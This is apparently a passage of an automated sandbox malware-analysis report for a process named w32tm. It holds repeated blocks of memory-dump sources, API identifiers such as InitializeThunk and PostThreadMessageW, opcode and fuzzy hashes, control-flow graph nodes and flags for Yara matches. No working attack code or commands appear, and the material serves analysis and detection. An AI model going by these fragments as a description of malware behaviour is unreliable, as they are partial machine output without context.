                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 5c8a432d8990f6300fe95995f447e7c938309fd8b2fea8c62bc1cead6c540835
                                                                                                                              • Instruction ID: 3170b1532d7a7be5c4869d26c3daf20e93c1424b6d28950ca510e2ac8e0704d6
                                                                                                                              • Opcode Fuzzy Hash: 5c8a432d8990f6300fe95995f447e7c938309fd8b2fea8c62bc1cead6c540835
                                                                                                                              • Instruction Fuzzy Hash: 53900265212404074909B15C4454616400AC7E1201B95C121E2014990DC725C9A16125
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 58a884f45b61bf1a2d07a57b4c3e7e8b7e9346a6ef5e93d8f8d525730e0fd083
                                                                                                                              • Instruction ID: 4859f5274bcf57588ecf20f9f71385ce587c3205b410ca0687fa1f7b9607e830
                                                                                                                              • Opcode Fuzzy Hash: 58a884f45b61bf1a2d07a57b4c3e7e8b7e9346a6ef5e93d8f8d525730e0fd083
                                                                                                                              • Instruction Fuzzy Hash: 6190023561540C06D954B15C44547460005C7D1301F95C111A1024A54D8755CB6576A1
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 3daea7a90cfd557449a8f452ade90329a5ab8b4cc47e53a1462de02100dd940a
                                                                                                                              • Instruction ID: a7aa9c618ad797b8df387cf55e47225b9a33b87e666fa5e2c1b28d75bae5f398
                                                                                                                              • Opcode Fuzzy Hash: 3daea7a90cfd557449a8f452ade90329a5ab8b4cc47e53a1462de02100dd940a
                                                                                                                              • Instruction Fuzzy Hash: F190023521140C06D984B15C444464A0005C7D2301FD5C115A1025A54DCB15CB6977A1
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 729de8ef88b7295d26337c4beafb46706dee9c2c7f12fbaca44d6104a0d977f2
                                                                                                                              • Instruction ID: f0c11494120775da674d0be48a5473b45cccb2bc42e3428aa945a12c649fa8f2
                                                                                                                              • Opcode Fuzzy Hash: 729de8ef88b7295d26337c4beafb46706dee9c2c7f12fbaca44d6104a0d977f2
                                                                                                                              • Instruction Fuzzy Hash: E990023521544C46D944B15C4444A460015C7D1305F95C111A1064A94D9725CE65B661
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 5b1f21d0f6e881c8e88be7bcba5f61608af2210c82db2a7ec0a74f72ab2a7026
                                                                                                                              • Instruction ID: c57f9d618ef75fe2ff31011ceaa12959a78b30d4525f3885514b805d0cdf1001
                                                                                                                              • Opcode Fuzzy Hash: 5b1f21d0f6e881c8e88be7bcba5f61608af2210c82db2a7ec0a74f72ab2a7026
                                                                                                                              • Instruction Fuzzy Hash: E4900229231404060949F55C064450B0445D7D73513D5C115F2416990CC721C9755321
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: abe8b3f6f6e0bf1774827083f2afbebeffcee892751dee2bada521bbee1408ad
                                                                                                                              • Instruction ID: 784bb09124120d88146ee7b74f70436cc2ac1a14646f5e2cdfe852c2221fc7f4
                                                                                                                              • Opcode Fuzzy Hash: abe8b3f6f6e0bf1774827083f2afbebeffcee892751dee2bada521bbee1408ad
                                                                                                                              • Instruction Fuzzy Hash: B2900229221404070909F55C07445070046C7D6351395C121F2015950CD721C9715121
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 4879540730d747805592e3f8ddbf0c30bc619c9e9d3a3a55691d8e022261d892
                                                                                                                              • Instruction ID: 08e52cedb6cc2f4075482f020a40b74a1da28f6117bdb3623c46146bbae3f065
                                                                                                                              • Opcode Fuzzy Hash: 4879540730d747805592e3f8ddbf0c30bc619c9e9d3a3a55691d8e022261d892
                                                                                                                              • Instruction Fuzzy Hash: 6190026535140846D904B15C4454B060005C7E2301F95C115E2064954D8719CD626126
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 060823b7f0a84f3dea5e346e3b703aba7815cc0b55ba31d71ad317471ed441bd
                                                                                                                              • Instruction ID: 0005b0b8a2ee5b9374ca0a84e23555d7ff7fc1ada2109b75523c26da80da165e
                                                                                                                              • Opcode Fuzzy Hash: 060823b7f0a84f3dea5e346e3b703aba7815cc0b55ba31d71ad317471ed441bd
                                                                                                                              • Instruction Fuzzy Hash: 3F900225611404464944B16C88849064005EBE2211795C221A1998950D8759C9755665
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: ed31982a770619017f068a57f52f432b63597f0e98e2b9a819f54636e5be6926
                                                                                                                              • Instruction ID: 7c36db7d479a3c1510e6d9aac3181f76d0f7153f0e578444d960c71fa6e9aa4b
                                                                                                                              • Opcode Fuzzy Hash: ed31982a770619017f068a57f52f432b63597f0e98e2b9a819f54636e5be6926
                                                                                                                              • Instruction Fuzzy Hash: 04900225221C0446DA04B56C4C54B070005C7D1303F95C215A1154954CCB15C9715521
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 59ffcf818ef4d2b37120bdf6afb675b0dc62c641222d9f62adf7d728bf817dd7
                                                                                                                              • Instruction ID: dbc3be9bfa045285da1a4419355376608dedb0f05e9c6d90908f5793773bbc1c
                                                                                                                              • Opcode Fuzzy Hash: 59ffcf818ef4d2b37120bdf6afb675b0dc62c641222d9f62adf7d728bf817dd7
                                                                                                                              • Instruction Fuzzy Hash: A590022561140906D905B15C4444616000AC7D1241FD5C122A2024955ECB25CAA2A131
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: b3a30f4924972bcc8bba5eea77dc02e4c90edb33a08c1d67a524eed45519a706
                                                                                                                              • Instruction ID: 8b22bdd19f9a92e572c6bd3a6bd5c04c6e8f6519bddb5a7bed9f7e2012682f86
                                                                                                                              • Opcode Fuzzy Hash: b3a30f4924972bcc8bba5eea77dc02e4c90edb33a08c1d67a524eed45519a706
                                                                                                                              • Instruction Fuzzy Hash: 0290026521180807D944B55C48446070005C7D1302F95C111A3064955E8B29CD616135
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 5d1fec4cc13d7a2511a9b0905b5421a39823709f462024f1385be2578fe7e9bd
                                                                                                                              • Instruction ID: 814f54beeda0b287184618cca6200261f5461f1d45d15b202a5efa04ee5d1637
                                                                                                                              • Opcode Fuzzy Hash: 5d1fec4cc13d7a2511a9b0905b5421a39823709f462024f1385be2578fe7e9bd
                                                                                                                              • Instruction Fuzzy Hash: 2A90022531140407D944B15C54586064005D7E2301F95D111E1414954CDB15C9665222
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: bf564df2403d49d38b34d70e7e5dc2419a8f37edbef0e01fa759a222a76400fe
                                                                                                                              • Instruction ID: b4f7c86445b1f4a881fb1f85219f2435fb0d86bf3e475ee5d6cb3a7ce36ef955
                                                                                                                              • Opcode Fuzzy Hash: bf564df2403d49d38b34d70e7e5dc2419a8f37edbef0e01fa759a222a76400fe
                                                                                                                              • Instruction Fuzzy Hash: B590022D22340406D984B15C544860A0005C7D2202FD5D515A1015958CCB15C9795321
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: fb03219d1b0264ec38a1aaeadda66cd2db4cf4ae126ef835bab455de4dba2759
                                                                                                                              • Instruction ID: 5dcf9bd7ef045643c1be84212a8d4253fae8640a444033376871d02d7c5d1dcc
                                                                                                                              • Opcode Fuzzy Hash: fb03219d1b0264ec38a1aaeadda66cd2db4cf4ae126ef835bab455de4dba2759
                                                                                                                              • Instruction Fuzzy Hash: 4290023521140817D915B15C45447070009C7D1241FD5C512A1424958D9756CA62A121
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 15f2b68f0a05c18c7c5aa41fd3c1e5f3c8aa09e53aefed85ec0bfd6956443cde
                                                                                                                              • Instruction ID: 71e6ef9dad5875b5ce4a4d20df7ba5e05d7473f03af2ae25293656859a0ec347
                                                                                                                              • Opcode Fuzzy Hash: 15f2b68f0a05c18c7c5aa41fd3c1e5f3c8aa09e53aefed85ec0bfd6956443cde
                                                                                                                              • Instruction Fuzzy Hash: 02900225252445565D49F15C44445074006D7E12417D5C112A2414D50C8726D966D621
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 8b72644031f5da4876b5d8819e327a34115003fc43719b47846f0deb60968685
                                                                                                                              • Instruction ID: 43f7f1d2587eb1b58452d90245f79e55150b56855534abee8e84c14cb149cb78
                                                                                                                              • Opcode Fuzzy Hash: 8b72644031f5da4876b5d8819e327a34115003fc43719b47846f0deb60968685
                                                                                                                              • Instruction Fuzzy Hash: FE90023521148C06D914B15C844474A0005C7D1301F99C511A5424A58D8795C9A17121
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 4d41d5166148691245dbafd5eaeca0d7f7429857d910d529276e8f334b6f7045
                                                                                                                              • Instruction ID: b2ed36e87899ef9219dd07b1a92b52c82a705ffe41cc60332094039463013003
                                                                                                                              • Opcode Fuzzy Hash: 4d41d5166148691245dbafd5eaeca0d7f7429857d910d529276e8f334b6f7045
                                                                                                                              • Instruction Fuzzy Hash: 7690023521140C46D904B15C4444B460005C7E1301F95C116A1124A54D8715C9617521
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: b84e5378f1faaa9aa80b346a02a4b88c07b2204bb800dcd748c23a9b99f5943b
                                                                                                                              • Instruction ID: fe23843d05929d75fa6a3902d8eadf77e82072cb3a747297bb9b736be5eae5e3
                                                                                                                              • Opcode Fuzzy Hash: b84e5378f1faaa9aa80b346a02a4b88c07b2204bb800dcd748c23a9b99f5943b
                                                                                                                              • Instruction Fuzzy Hash: 7F90023521140806D904B59C54486460005C7E1301F95D111A6024955EC765C9A16131
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: d09dbb299a07bf70fa6642b985fd72ff6217d949191181c22e786a6249d49fc0
                                                                                                                              • Instruction ID: 35be0816f4615d9687d3fb422129189f27d9cf3364635f63b4045102221b5fa0
                                                                                                                              • Opcode Fuzzy Hash: d09dbb299a07bf70fa6642b985fd72ff6217d949191181c22e786a6249d49fc0
                                                                                                                              • Instruction Fuzzy Hash: 8890023561550806D904B15C45547061005C7D1201FA5C511A1424968D8795CA6165A2
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: aa3fc41a12519186b5d2e5886b3f51acdc4f5728384339538a86ccf818550a12
                                                                                                                              • Instruction ID: ebd35b59cf8fe1957e98b360f83562c63bc08d0e710ffb19d75351e8d30167bf
                                                                                                                              • Opcode Fuzzy Hash: aa3fc41a12519186b5d2e5886b3f51acdc4f5728384339538a86ccf818550a12
                                                                                                                              • Instruction Fuzzy Hash: 1D90022525545506D954B15C44446164005E7E1201F95C121A1814994D8755C9656221

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 522 961542-961562 523 96156a-9615ba call 97c8e0 call 964d50 call 951410 call 9724a0 522->523 524 961565 call 97bed0 522->524 534 9615bc-9615cb PostThreadMessageW 523->534 535 9615da-9615e0 523->535 524->523 534->535 536 9615cd-9615d7 534->536 536->535
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(131E9KP,00000111,00000000,00000000), ref: 009615C7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID: 131E9KP$131E9KP
                                                                                                                              • API String ID: 1836367815-3525948182
                                                                                                                              • Opcode ID: bfa1500bdb96331deab5ef4115675dcab88f7d2af4afad1e54ff1466c616a396
                                                                                                                              • Instruction ID: c6fcea197ca317d39a5a8d6bfb273088a4c9901c6654e3549d5b3ad2c94eef71
                                                                                                                              • Opcode Fuzzy Hash: bfa1500bdb96331deab5ef4115675dcab88f7d2af4afad1e54ff1466c616a396
                                                                                                                              • Instruction Fuzzy Hash: 7B11E5B2D4021C7BDB11ABE14C81EEFBB7CEF80794F04C068FA04A7241D6349E068BA1

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 537 961550-9615ba call 97bed0 call 97c8e0 call 964d50 call 951410 call 9724a0 549 9615bc-9615cb PostThreadMessageW 537->549 550 9615da-9615e0 537->550 549->550 551 9615cd-9615d7 549->551 551->550
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(131E9KP,00000111,00000000,00000000), ref: 009615C7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID: 131E9KP$131E9KP
                                                                                                                              • API String ID: 1836367815-3525948182
                                                                                                                              • Opcode ID: 6681528f16e5317c5feafe2d32287d225b6bc1a41dbc7fab3417e1b7743aeb06
                                                                                                                              • Instruction ID: 18a6c618a53a6d43073c59ff532ada0898687480f99c30429afa02a9d1899d12
                                                                                                                              • Opcode Fuzzy Hash: 6681528f16e5317c5feafe2d32287d225b6bc1a41dbc7fab3417e1b7743aeb06
                                                                                                                              • Instruction Fuzzy Hash: 570196B2D4021C7ADB11ABE54C82EEFBB7CEF81798F048064FA18A7141D6745E064BB1

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 618 961534-961536 619 96159a-9615ba 618->619 620 961538 618->620 621 9615bc-9615cb PostThreadMessageW 619->621 622 9615da-9615e0 619->622 623 96153a-961541 620->623 624 961598-961599 call 9724a0 620->624 621->622 625 9615cd-9615d7 621->625 624->619 625->622
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(131E9KP,00000111,00000000,00000000), ref: 009615C7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_950000_w32tm.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID: 131E9KP$131E9KP
                                                                                                                              • API String ID: 1836367815-3525948182
